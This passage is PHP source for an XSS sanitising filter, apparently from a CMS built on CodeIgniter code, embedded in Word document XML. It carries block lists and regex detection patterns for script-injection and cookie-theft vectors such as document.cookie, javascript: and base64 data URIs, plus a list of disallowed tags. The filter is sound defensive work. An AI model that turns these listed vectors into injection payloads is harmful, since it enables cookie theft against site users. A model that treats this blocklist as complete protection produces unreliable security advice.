    <w:p w14:paraId="460591CC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB71A4C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>protected $_xss_hash;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178B19F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7E42FCB2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE533FE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * List of never allowed strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760896E0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290F61A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @var</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E1E7C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4024491F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>protected $_never_allowed_str =</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B160E71" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'document.cookie' =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834D946" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'(document).cookie' =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E800C34" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'document.write'  =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160DC17" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'(document).write'  =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE836D8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'.parentNode'     =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768CEA29" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'.innerHTML'      =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700241A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'-moz-binding'    =&gt; '[xss_clean]',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75C100" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'&lt;!--'            =&gt; '&amp;lt;!--',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A08BF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'--&gt;'             =&gt; '--&amp;gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE6905" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'&lt;![CDATA['       =&gt; '&amp;lt;![CDATA[',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FFB25E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'&lt;comment&gt;'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  =&gt; '&amp;lt;comment&amp;gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A99EA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'&lt;%'              =&gt; '&amp;lt;&amp;#37;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F70B6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3D3A1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="38CA9557" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>// 替换前的处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECFF9E1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>protected $_never_call_str = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB20D53" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        '&amp;quot;javascript:'    =&gt; '&amp;quot;javascript_xunruicms:',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5E1CD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4353D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7A9B2EBD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CF0BD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * List of never allowed regex replacements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C41AD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C05A79" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @var</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B9884" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6E182" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>protected $_never_allowed_regex = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35362519" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'javascript\s*:',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A06FF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'(\(?document\)?|\(?window\)?(\.document)?)\.(location|on\w*)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B5973" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'expression\s*(\(|&amp;\#40;)', // CSS and IE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14137183" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'vbscript\s*:', // IE, surprise!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6752C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'wscript\s*:', // IE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9F6DF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'jscript\s*:', // IE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D809357" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'vbs\s*:', // IE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A151A4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'Redirect\s+30\d',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC5BCAC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"([\"'])+data\s*:[^\\1]*?base64[^\\1]*?,[^\\1]*?\\1?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE3DFE2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410D34C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6486B731" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1F2EAF90" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5D11FC34" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>// --------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16054F61" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="64C2F2B6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E60BFB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * XSS Clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05666A30" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45046A49" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Sanitizes data so that Cross Site Scripting Hacks can be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E4ADC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * prevented.  This method does a fair amount of work but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AB9AF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * it is extremely thorough, designed to prevent even the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2274B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * most obscure XSS attempts.  Nothing is ever 100% foolproof,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA5558" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve"> * of course, but I haven't been able to get anything passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508ED82" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * the filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C5438" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87A077" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Note: Should only be used to deal with data upon submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23D0F1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> It's not something that should be used for general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1393F9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> runtime processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920C346" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F02C2C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @link</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>http://channel.bitflux.ch/wiki/XSS_Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB625B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Based in part on some code and ideas from Bitflux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B593D1D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A4559" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @link</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>http://ha.ckers.org/xss.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68932991" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>To help develop this script I used this great list of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE8F64" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>vulnerabilities along with a few other hacks I've</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BFE8DC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>harvested from examining vulnerabilities in other programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245531BD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361F633" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @param</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string|string[]</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Input data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EFADE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @param </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>bool</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$is_image</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    严格的过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755ABF55" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @return</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B11EC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B4FE4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>public function xss_clean($str, $is_image = FALSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54D0C5" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9E177" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7DAB9281" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (is_numeric($str)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A205DDE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BDE2FF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>} elseif (!$str) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9FFD8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398C595" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E09CE0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="61EF1C9B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Is the string an array?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D296158" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (is_array($str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27882A30" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC73646" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>foreach ($str as $key =&gt; &amp;$value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E79F62B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5A830" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str[$key] = $this-&gt;xss_clean($value, $is_image);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007207BE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319FB062" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="563E6775" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313E043" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F49F3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4014C06D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        if (json_encode( $str) === false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7726E492" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            return '[xss_clean]'; // 判断含有乱码直接过滤为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1BA01D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA41BF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5018DB42" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;naughty_tags = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A04685" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'alert', 'area', 'prompt', 'confirm', 'applet', 'audio', 'basefont', 'base', 'behavior', 'bgsound',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE55EC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'blink', 'body',  'expression', 'form', 'frameset', 'frame', 'head', 'html', 'ilayer',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3375E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'input', 'button', 'select', 'isindex', 'layer', 'link', 'meta', 'keygen', 'object',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FFC11" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            'plaintext', 'script', 'textarea', 'title', 'math',  'svg', 'xml', 'xss',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C962019" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            //'iframe', 'video', 'embed', 'style'  //排除过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A25BE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
